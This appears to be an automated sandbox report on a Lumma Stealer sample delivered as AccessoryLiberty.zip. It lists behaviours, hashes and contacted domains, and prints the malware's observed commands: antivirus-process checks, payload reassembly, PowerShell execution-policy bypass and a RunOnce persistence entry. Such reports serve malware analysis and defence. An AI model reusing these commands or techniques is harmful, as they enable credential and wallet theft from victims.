Analysis Overview
SHA256
b80c11df84d7873d503f4961a305ffe8ea74ce65d411273183939d3c446cb5f8
Threat Level: Known bad
The file AccessoryLiberty.zip was found to be: Known bad.
Malicious Activity Summary
Lumma family
Lumma Stealer, LummaC
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 19:37
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 19:37
Reported
2024-11-13 19:39
Platform
win7-20240903-en
Max time kernel
117s
Max time network
117s
Command Line
Signatures
Lumma Stealer, LummaC
Lumma family
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
Checks installed software on the system
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2944 set thread context of 1864 | N/A | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\PharmaciesLowest | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
| File opened for modification | C:\Windows\CouncilsStatement | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe
"C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Coordination Coordination.bat & Coordination.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 208231
C:\Windows\SysWOW64\findstr.exe
findstr /V "pantiescurverefrigeratorcapital" Portfolio
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Canada + ..\Dv + ..\Admissions + ..\Strand + ..\Boring + ..\Synthetic + ..\Evaluation O
C:\Users\Admin\AppData\Local\Temp\208231\War.pif
War.pif O
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\8DM73Q6MILY9OMG2FF0EK1936BFOZYX.ps1"
C:\Users\Admin\AppData\Roaming\OSXTOC.pif
"C:\Users\Admin\AppData\Roaming\OSXTOC.pif" "C:\Users\Admin\AppData\Roaming\D4LFFM.pptm"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | fiuflJZlSGqtte.fiuflJZlSGqtte | udp |
| US | 8.8.8.8:53 | toleratedbaybo.cyou | udp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 8.8.8.8:53 | cdn1.pixel-story.shop | udp |
| US | 104.21.32.85:443 | cdn1.pixel-story.shop | tcp |
| US | 8.8.8.8:53 | pixelpalette.shop | udp |
| US | 104.21.84.104:443 | pixelpalette.shop | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Coordination
| MD5 | 485f89cfaf1420f132a95a0b7c6e6305 |
| SHA1 | efb827df52282fb79b5f44ec9e63b8e5a47c37e1 |
| SHA256 | eea03a384671dd1323b8d853ed49df8a27dbc2a706400437bd8d48e6076453bd |
| SHA512 | 116c823265a05c4b338e94204ce48267f112d12e55a8473fc05426af0a476c37fc272408eb805d117f6e8cab059fbd708c6158bd041ff3e9a8a430a577cc669b |
C:\Users\Admin\AppData\Local\Temp\Portfolio
| MD5 | 4d06e14fe2951aa0024c22936e5f531b |
| SHA1 | c718b677b65d246033898069459f078a00f650be |
| SHA256 | 0e3ab81f015e71af9b43ed7fd5854c3560c6ce09443b0cbffb0ac6c10d93d918 |
| SHA512 | 5bf78bc3bfce3553dff1e80ec3fef4c2589e618b1a3ac2723ed89a24c5fdd78b5e80f2bc778346f21b2c5f9750c00ea7a5ba9b3bd42f9f9f804ef838b92c887c |
C:\Users\Admin\AppData\Local\Temp\Shoppers
| MD5 | 52620731f9486725cceaf71e1a45cc9f |
| SHA1 | 0d166e1027ae7903dced0abe3570f71516fc5baf |
| SHA256 | 73e5301ad4b4aea78e34de20b8088641fc1d04b1444ed4ecbc6da47603d87cc2 |
| SHA512 | b4546af693050332c0477dd38b5e816ac2fe490d550ae296ef759714c33c96a648e4ed96294b777392bbfaf6fba876460f78c5730ecc61ef801f45cdb298dc36 |
C:\Users\Admin\AppData\Local\Temp\Canada
| MD5 | d426ef537d4e36651d372eb67de61c71 |
| SHA1 | c00ecae6e973056c698680c714bd8c932df53c56 |
| SHA256 | f0919fbdae23b005eb403344118d8509a316037ae5460484d81d8452a74812e3 |
| SHA512 | d042b71e1badef416e42f8c1235163ed7a71ae5d3cd897aca1dbb2b344769428b37e71e7b9b1a6c0ffbfdab8222eff893fc28415389b5afdcd262bd7eb7a40d6 |
C:\Users\Admin\AppData\Local\Temp\Dv
| MD5 | 367fecb6d4d73f3e22e2186fbe91f216 |
| SHA1 | 2bce21a05dfeee536cda999fbaa73c1af28b9d86 |
| SHA256 | 11741c20239ea1dd1c392abda3ee226e16ad2fd004f8fe344d2d068c8e20ef62 |
| SHA512 | 09009011345cc71715ba9ff975d0d304d3160090281a3c9672187b2f2c3eeab3653c31849f1306ae3d77459e0de8f63ce2037c0d330c16c361491d32b089b315 |
C:\Users\Admin\AppData\Local\Temp\Admissions
| MD5 | b9675af1aafe9bbc3397bb840117840a |
| SHA1 | e0fae0f4ef594f472216025e838fadbb2aa0b861 |
| SHA256 | 875276f91f4aa27b3d23da12c88e94871fe7ed6401ec8f4657b4f6be2f33a01d |
| SHA512 | 70a24225488d1e41f36244d7811766e2379b8c90ea57d1fb5d33b54e2f62e032002a7c2e45aeb8f47e45840a6cc16cfed5680f88e71de68b3a15af73db24a5e6 |
C:\Users\Admin\AppData\Local\Temp\Evaluation
| MD5 | 9c1eec6ad97d3430478939c6df01ea8a |
| SHA1 | be6e6c3fbb3fb22e34d7b5bc2c1a2d996bb4e81e |
| SHA256 | fbc43c30a07c44894f7870d666d3e370f4d5f77695d5fa727597884c1495fc9b |
| SHA512 | 2f4923eccd70a2790b6a6e4876f91aa9fd87b7e767abac3e48084b14de21a7beccf471eca35b9df1069e67ed18407916213ff7b52b129fe252c7169b2081bad6 |
C:\Users\Admin\AppData\Local\Temp\Synthetic
| MD5 | c0391116646bfea7d85bb681a33e3ba0 |
| SHA1 | 9996422133ed60d69b923b118949183e8758e0a3 |
| SHA256 | 5791d23d4c78f0e17d98eee9e51ebf24ea678fdf9b059bfb5dcf19c16dcba85a |
| SHA512 | 3e6a4e31ad6161fa617aa116378d9817390a031e640a157cdda299e8d0dddc4e27517ff53ed56081c0c34b348be627b6a5ab6f1c1ae9192f34a446ba19b23f47 |
C:\Users\Admin\AppData\Local\Temp\Boring
| MD5 | 10e29c8822f7da216b45a11d3ee0eda8 |
| SHA1 | 23e62cb3f04cd00b22fe54a65e3b81518c78e614 |
| SHA256 | 4a4f9151f243bd1eca82a0721bae4136e37c3835324991516c62fc70f99dcb05 |
| SHA512 | c0a2772c8ae6c4b450f38327c8386f526ffff7f3bec3bf6e495a2a01b465da64de4d815e51961f37cb43239b05d3fd53a01fb4b33cd0fa67a84680bc24ffe572 |
C:\Users\Admin\AppData\Local\Temp\Strand
| MD5 | cd7bd19edb3ded5365bab0e5956309db |
| SHA1 | 1e0d4ba49a9592faebcfa4119f523ca7735108bb |
| SHA256 | 84078ab15033945d702802a013fbc3142b56db1371ff79ba1107df211300d803 |
| SHA512 | 574476aaf140810d1cfd9a99187097d68c024c89c57f82a2399e2933f46e854989364759e35474048eaad35b817c63d05e19ed75393ec893bbaf57f7061d96e4 |
\Users\Admin\AppData\Local\Temp\208231\War.pif
| MD5 | 78ba0653a340bac5ff152b21a83626cc |
| SHA1 | b12da9cb5d024555405040e65ad89d16ae749502 |
| SHA256 | 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7 |
| SHA512 | efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317 |
C:\Users\Admin\AppData\Local\Temp\208231\O
| MD5 | 36464052c5bab6fbe9375ae0c39f051a |
| SHA1 | cd35ee319164eb8a73bc8b5f86fea33b7227ae64 |
| SHA256 | d0b9c83c8bddbe2d9e18b0e8c5e3abcdb3bac5a9f6f3058fc3bcb8d3fde78ced |
| SHA512 | 01a7c98f1fa174dfc72360372b01e641a432e5b429ac3a366a9648f42e1776e9cfd5f9834173a8483fc470b1ec7fcadde7a7f639e07f08dadf460f5b46e9cb59 |
memory/2640-556-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-558-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-560-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-559-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-557-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-555-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-568-0x0000000002580000-0x00000000025B9000-memory.dmp
memory/2640-569-0x0000000002580000-0x00000000025B9000-memory.dmp
memory/2640-567-0x0000000003890000-0x00000000038E7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8DM73Q6MILY9OMG2FF0EK1936BFOZYX.ps1
| MD5 | a93ef812fcdf3af24ff8b33a75d4992e |
| SHA1 | b282892bd321a8709474f43d790d7e661edaa98f |
| SHA256 | d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6 |
| SHA512 | 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037 |
\Users\Admin\AppData\Roaming\OSXTOC.pif
| MD5 | 3f58a517f1f4796225137e7659ad2adb |
| SHA1 | e264ba0e9987b0ad0812e5dd4dd3075531cfe269 |
| SHA256 | 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48 |
| SHA512 | acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634 |
C:\Users\Admin\AppData\Roaming\D4LFFM.pptm
| MD5 | 3c6d0866e54ab391bc09713fde4c9d38 |
| SHA1 | a1a4e9c067e3c85739e85fb45f7ecdb363bcf856 |
| SHA256 | ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682 |
| SHA512 | eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4 |
memory/1864-586-0x0000000000400000-0x00000000009BA000-memory.dmp
memory/1864-587-0x0000000000400000-0x00000000009BA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 19:37
Reported
2024-11-13 19:39
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
138s
Command Line
Signatures
Lumma Stealer, LummaC
Lumma family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
Checks installed software on the system
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\CouncilsStatement | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
| File opened for modification | C:\Windows\PharmaciesLowest | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe
"C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Coordination Coordination.bat & Coordination.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 208231
C:\Windows\SysWOW64\findstr.exe
findstr /V "pantiescurverefrigeratorcapital" Portfolio
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Canada + ..\Dv + ..\Admissions + ..\Strand + ..\Boring + ..\Synthetic + ..\Evaluation O
C:\Users\Admin\AppData\Local\Temp\208231\War.pif
War.pif O
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\K1HDCVMZ3CHA6WL98LCQ54O6LSAEU.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc [base64-encoded command not preserved in this report]
C:\Users\Admin\AppData\Roaming\0VYTBW.pif
"C:\Users\Admin\AppData\Roaming\0VYTBW.pif" "C:\Users\Admin\AppData\Roaming\KHOIE0.vsd"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
